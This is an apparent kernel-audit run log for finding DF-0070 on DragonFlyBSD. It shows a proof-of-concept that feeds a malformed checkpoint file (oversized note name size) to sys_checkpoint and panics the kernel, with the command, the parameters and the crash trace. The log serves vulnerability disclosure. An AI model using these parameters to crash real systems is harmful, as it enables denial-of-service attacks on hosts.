DragonFlyBSD Kernel Audit
DF-0070 / run.log
← back to finding ↓ download raw
=== DF-0070 run.log (panic mode, RUN 2 -- from fresh `vm.sh reset`) ===
Guest: DragonFly dfbsd 6.5-DEVELOPMENT v6.5.0.1712.g89e6a-DEVELOPMENT (build 2026-06-29) X86_64_GENERIC
Caller: root (kern.ckptgroup=0, wheel-only by default)

Command on guest (root):
    cd /tmp/df70 && (./df0070 evil.ckpt) 2>&1; echo RUN_EXIT=$?

$ ./df0070 evil.ckpt
[*] DF-0070 PoC: building evil.ckpt  (notesz=880, n_namesz=0x10000000, n_descsz=120, mode=panic)
[*] calling sys_checkpoint(CKPT_THAW, fd=3, pid=-1, retval=0) [syscall #467]...
<ssh session terminated: guest kernel panicked -- see panic.txt>

-- vm.sh status after run: down (guest in DDB debugger) --

Panic signature captured from dfbsd-qemu/boot.log:
    panic: assertion "obj != NULL" failed in vm_object_hold_shared at /usr/src/sys/vm/vm_object.c:330
    cpuid = 0
    Trace beginning at frame 0xfffff800aba2d338
    vm_object_hold_shared() at vm_object_hold_shared+0x3f 0xffffffff809ab0cf 
    vm_object_hold_shared() at vm_object_hold_shared+0x3f 0xffffffff809ab0cf 
    vm_fault() at vm_fault+0x408 0xffffffff8099d7c8 
    trap_pfault() at trap_pfault+0x9a 0xffffffff80bd49da 
    trap() at trap+0x17c 0xffffffff80bd52dc 
    calltrap() at calltrap+0x9 0xffffffff80b9890a 
    --- trap 000000000000000c, rip = ffffffff80bca038, rsp = fffff800aba2d750, rbp = fffff800aba2d7b8 ---
    memmove() at memmove+0x28 0xffffffff80bca038 
    Debugger("panic")

    CPU0 stopping CPUs: 0x00000002
     stopped
    Stopped at      Debugger+0x7c:  movb    $0,0xbd77f9(%rip)
    db> 

Code offsets in the trace are byte-identical across RUN 1 (pre-reset) and
RUN 2 (post-reset); only the randomised stack-frame base addresses
(0xfffff800ab88b... vs 0xfffff800aba2d...) differ.  Same bug, same path.

trap 0xc  == T_PAGEFLT  (kernel-mode page fault)
memmove+0x28 is the inner bcopy/memmove backing the OOB bcopy at
sys/kern/kern_checkpoint.c:346 in elf_getnote().